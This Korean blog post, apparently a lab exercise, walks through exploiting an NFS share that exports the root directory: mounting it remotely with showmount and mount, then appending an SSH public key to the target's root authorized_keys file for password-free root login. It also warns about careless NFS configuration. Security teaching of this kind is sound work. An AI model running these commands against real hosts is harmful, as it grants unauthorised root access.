■ NFS 취약점 공격
- 여기서의 설정은 방화벽이 뚫려있는 상태를 가정하고 공격 진행
- NFS 설정 시, root 권한을 함부로 주거나 중요한 Directory를 Mount 하게 되면 상대방이 내가 원하지 않는 부분까지를 확인할 수 있게 된다.
=> 그렇기 때문에 NFS를 설정할 때, 어떤 Directory를 NFS로 사용할지, 어떤 권한을 줄지 고려해야 한다
- # yum install -y nfs-utils: NFS를 사용하기 위해서 nfs-utils 설치
- # vi /etc/exports: "/" Directory를 NFS 설정
- # apt-get install -y nfs-common: showmount를 사용하기 위해서 설치
- # showmount -e 1.0.0.51: 해당 IP의 mount 정보 출력, / mount 확인
- # mount -t nfs 1.0.0.51:/ /test: /test를 1.0.0.51 Host의 / NFS Directory에 mount 시킨다.
- 위와 같이 생각 없이 NFS를 설정하게 되면 상대방이 원하지 않는 Directory까지 확인할 수 있게 된다.
- # ssh-keygen: SSH Keygen 생성
- # cat .ssh/id_rsa.pub >> /test/root/.ssh/authorized_keys: 생성한 SSH Keygen을 root의 SSH 권한 키 파일에 추가한다.
- SSH로 접속하게 되면, 공격 PC가 가지고 있는 Keygen이 공격받은 PC의 Keygen파일에 추가되기 때문에 비밀번호 없이 접속된다.
'Server > 보안' 카테고리의 다른 글
Web 취약점 분석 - Brute Force Attack, Command Injection (환경: beebox, DVWA / 분석: Burp Suite) (0) | 2019.08.03 |
---|---|
Kali Linux - DNS Spoofing 공격 (Ettercp 이용) (0) | 2019.08.02 |
Kali Linux - ARP Spoofing 공격 (Ettercp 이용) (0) | 2019.07.28 |
Kali Linux - DHCP Starvation 공격 (Yersinia 이용) (0) | 2019.07.23 |
Kali Linux - 취약점 분석 도구, 명령어(정보 수집 / openvas, nessus, nmap, dig, beef) (0) | 2019.07.22 |